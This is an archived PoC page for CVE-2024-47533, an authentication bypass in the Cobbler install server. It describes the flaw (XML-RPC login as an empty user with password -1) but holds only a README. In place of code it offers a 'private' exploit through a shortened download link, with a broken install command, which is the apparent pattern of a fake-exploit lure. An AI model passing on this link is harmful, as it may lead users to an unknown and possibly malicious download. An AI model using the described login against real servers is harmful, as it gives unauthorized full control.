CVE-2024-47533 PoC — Cobbler 授权问题漏洞

Source

https://github.com/zetraxz/CVE-2024-47533

Associated Vulnerability

Title:Cobbler 授权问题漏洞 (CVE-2024-47533)
Description:Cobbler是Cobbler开源的一款网络安装服务器套件，它主要用于快速建立Linux网络安装环境。 Cobbler 3.0.0到3.2.3和3.3.7之前版本存在授权问题漏洞，该漏洞源于身份验证不当，导致任何能够通过网络访问服务器的人都可以完全控制该服务器。

Description

CVE-2024-47533: Improper Authentication (CWE-287)

Readme

# CVE-2024-47533: Improper Authentication (CWE-287)

## Overview

Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability. This vulnerability gives anyone with network access to a Cobbler server full control of the server. The impact is severe, as it allows unauthorized access with the highest privileges.

## Details
+ CVE ID: CVE-2024-47533
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.8


## Exploit
**[Download Here](https://bit.ly/3ZcRKBx)**


## Vulnerability Description

The issue lies in the `utils.get_shared_secret()` function, which always returns `-1`. This flaw allows anyone to connect to the Cobbler XML-RPC as user `''` with password `-1` and make any changes.


## Affected Versions

This vulnerability affects versions starting from **3.0.0 and prior to versions 3.2.3 and 3.3.7.**

## Usage

```
pip install requirements.txt
python CVE-2024-47533.py
```


## Exploit
**[Download Here](https://bit.ly/3ZcRKBx)**


## Contact
For inquiries, please contact zetraxz@thesecure.biz

File Snapshot


 [4.0K]  /data/pocs/4a306e60832fd095a2511f7debe33600c4fc3df9
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!